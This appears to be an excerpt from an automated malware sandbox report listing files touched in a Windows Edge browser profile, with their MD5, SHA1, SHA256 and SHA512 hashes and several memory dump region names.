SHA512 048a348a4a2c5d8599df7767f7bdf17cfa47396a7d0d076fe47eadfe9ffa233efef1eced8ec4c1e458103b72bc772fd0fdce2af8cd5f203aa5e74b278cdba390

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e

MD5 5c1f5b5423d642cbe35e227fe9876eaa
SHA1 30305673953a3687555d09f36ab6158dd3f06c8a
SHA256 02d9dc055ce694838aee2468fcd912c5bbb5b9fc5676c4179dafbed1119f0c44
SHA512 c52ce31bf7afc754e71cdcd3857f9acb5544efdf72751d968f15d77a5e8b5faef63fe16c3e78aff96dfe57a814aefe4cd507ad7632ca3c2030053c71f9107e94

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000042

MD5 48b805d8fa321668db4ce8dfd96db5b9
SHA1 e0ded2606559c8100ef544c1f1c704e878a29b92
SHA256 9a75f8cc40bbe9c9499e7b2d3bab98a447685a361489357a111479517005c954
SHA512 95da761ca3f99f7808a0148cfa2416b8c03d90859bff65b396061ada5a4394fb50e2a4b82986caab07bc1fcd73980fe9b08e804b3ce897762a17d2e44935076d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000051

MD5 ce6bda6643b662a41b9fb570bdf72f83
SHA1 87bcf1d2820b476aaeaea91dc7f6dbedd73c1cb8
SHA256 0adf4d5edbc82d28879fdfaaf7274ba05162ff8cbbda816d69ed52f1dae547f6
SHA512 8023da9f9619d34d4e5f7c819a96356485f73fddcb8adb452f3ceefa8c969c16ca78a8c8d02d8e7a213eb9c5bbe5c50745ba7602e0ee2fe36d2742fb3e979c86

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 026facc7cc035fccc747bfe8124d5189
SHA1 b6dc71461046d6fc37d99f36508aa1cb70037eaa
SHA256 c859b960fd130fe14e9f2638c2ba54693e2dab2df9fb438bd4f012550aca016b
SHA512 33716195a03baa971499b80d607bda68fafd31bef3bc0eb63bb2a7185a9537d18055e3926b794be2f685e89d0e3c10576010d1a5d1b0234c864a17c49a2b2542

memory/2828-2352-0x00007FF61F760000-0x00007FF61FD01000-memory.dmp

memory/8636-2353-0x0000000000B70000-0x0000000000B90000-memory.dmp

memory/8020-2358-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000052

MD5 57613e143ff3dae10f282e84a066de28
SHA1 88756cc8c6db645b5f20aa17b14feefb4411c25f
SHA256 19b8db163bcc51732457efa40911b4a422f297ff3cd566467d87eab93cef0c14
SHA512 94f045e71b9276944609ca69fc4b8704e4447f9b0fc2b80789cc012235895c50ef9ecb781a3ed901a0c989bed26caa37d4d4a9baffcce2cb19606dbb16a17176

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000054

MD5 4f7c668ae0988bf759b831769bfd0335
SHA1 280a11e29d10bb78d6a5b4a1f512bf3c05836e34
SHA256 32d4c8dc451e11db315d047306feea0376fbdc3a77c0ab8f5a8ab154164734d1
SHA512 af959fe2a7d5f186bd79a6b1d02c69f058ecd52e60ebd0effa7f23b665a41500732ffa50a6e468a5253bb58644251586ae38ec53e21eab9140f1cf5fd291f6a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000053

MD5 2d64caa5ecbf5e42cbb766ca4d85e90e
SHA1 147420abceb4a7fd7e486dddcfe68cda7ebb3a18
SHA256 045b433f94502cfa873a39e72d616c73ec1b4c567b7ee0f847f442651683791f
SHA512 c96556ec57dac504919e806c7df536c4f86892b8525739289b2f2dbbf475de883a4824069dbdd4bb1770dd484f321563a00892e6c79d48818a4b95406bf1af96

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 312dee94f21bf0422c878d4ca4b1d774
SHA1 762a46c0eba7af940c19113a0ba4d67f2450b509
SHA256 5658d9400d5c221c55b67c38f3844b40ede34ba815ce78b4386808bea61878aa
SHA512 22623173c189df1a46d8734aba025ea2b6cb71ef63f785310ae76193939cb2a79d78d025c3e9c41240baa9cd4cdb44cf157e7c826d5c4887df95a22ef0f62c05

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 30525341c823f5703acabf9e2fd95360
SHA1 7a229d2cf3b68ea53c382e32f774ee235ef6b5d8
SHA256 fc9ab96c57f0f997fcb2d34da935f15721cd7c209eef781a0beb1ea79349a7c6
SHA512 a140642ea89fffd989d8db938c0047238f9c93312a566532711f1484b7fe96e57bfa0569f50e9115bca264210c2557d841d9f2fc34fdb6e97758b11f7bed37be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

MD5 235c64eb1b40e2a86ec3ed532ca0fbf8
SHA1 49a3d6b3ed02776086ebe8996229a07b078ab522
SHA256 c4f9303b53e42a986f9810a725ae6e273715e6f492d7ac153f6b6cb59d121853
SHA512 b8ecbd2295dac03e414f4a91dc3eea58e717e6e58d0ba65ee372e72796fcd99465044aa01707711eefaf10a949524cd26d2b1d1de2a7424d39224a5e8b78d539

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt~RFe59a6f4.TMP

MD5 a23e89043a9ab79e0fa2cd2c5ee5d916
SHA1 56d27839633834391631feb885f015f51a64db3d
SHA256 d83fc7c9dd0fde668e29c9d380f43ef44b4ceb1fccefc18b10d2de8f481b68cd
SHA512 9ff80edd3a5698fadd37d404f2a2aa7193343f769278205ded80b8e01741851521eee0ab9f40cd29c889be3805cb291dcabea004a5fadda7a5901addc3ca2372

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\57eab8e5-599a-4d06-bfc9-38410180d451\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

MD5 603b46a042ff004fa5b18b5e64a7c121
SHA1 d5edc542e336e7c4ecd7279b1d5e5666c7b00a31
SHA256 077ce9cdd14688ea70f9a22a75c6f97416213cc8b869a0b1d4de476403e6b8be
SHA512 a22e853dce127dfe6c0ca5401ca488ea4cd37011a19e32557cf5c2438b75b97ac62c7b1adc1acfb67c6a47e39979cd5c778413ddf6246a46835c7a2f7c69066f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000058

MD5 1490acc6c189316c545989694777347d
SHA1 40d46c9364bcad6fa1f9e5eeeca1120e3124e903
SHA256 fe349cee3e127dc9754839d36e462abdb47db388502b0fe5c0132252d3bea75f
SHA512 4e34822f615e7c4a105ed9e1de727cb28b1bd349a14f1dc53313b473c25a50bbffba66d757747d8d0b201ede64d89d73dc918be7cb87614592f5720629cd76ba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 85122ab68ee0ec8f5b454edd14c86c41
SHA1 d1b1132e3054ff3cef157fea75f4502c34fa5e26
SHA256 4f5169675d35f59c99a0a4e41a52a0b79a86117a9244ac79dbb1e7cc13e0e9b5
SHA512 dae95ac0a262b0fc88302050c51158e11fd113c05efa351bee3213e75150181915a870e00ec0797ec994462ccd841c77215a7b7b0d02651d4757f03ba17274ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000063

MD5 3d2f4182c474d87c9d1fecf7af9f7082
SHA1 213a499d3f304b2015efb399a0faf08bc78c4306
SHA256 c243f4ab8abf11750a75121292f499ff77213c6c56c0aed0730f3cdf084036d9
SHA512 c22ece464abfc073c7f417b571fd534bcfbbb953b89c10e878bc74b2de671fed0e667a1abee380cf14c49680d2d9ce1d5ee920dc676d05e37965ad3e6348d1d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 eb88d2edc8b9d2cf9a94abdd45dc90a8
SHA1 9b350ac1139fcc48b69a779b7c4c37365e355884
SHA256 165f84b0b4a8f9f99a9978f7dc793f556ea99ce046fba53aced9c6d0e1d7f2fd
SHA512 0e1a4c6f419b6576a4cbb584003fb7c0febfc80684c972cf0f3cc183d33384dca83d4ec44ce7ad54a0ae9fdea877014213b755113d1537574d9c66ac67c72651

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000065

MD5 ab18a46f7c0b1a34b19d40d2198dbea0
SHA1 fe6fb562b7c2ce00e4fbefb140b0281631e03376
SHA256 27d2a2e22ff6476c72078311e9e1c58b1b72ec687f563b2d4f802f99e65afb12
SHA512 fdf94f4ad2923c1d4245279e1983e1e1ea3d6cc15793b9eedf79daf66ca44c5c4c78c04371b5a752906fe9c6975db36342f6e43ef457f28c67d3c81b8b9e8cab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000068

MD5 67412b247e0ff9363d571537acb61e09
SHA1 e58351674fb43e8fec92c7258ebe25703fc708ad
SHA256 663d61f95733059cd6879a8d5f2fdc8b0a1705a3fd25d0ed013ae8f09e215666
SHA512 b193da22ca7fe981cd8e30107fc5d9b3007b3b91310bea0d41d379bc36421e83396364b5bb78676a3fff2f6909773438889cac231c31eef1d13e62f1b32e59b7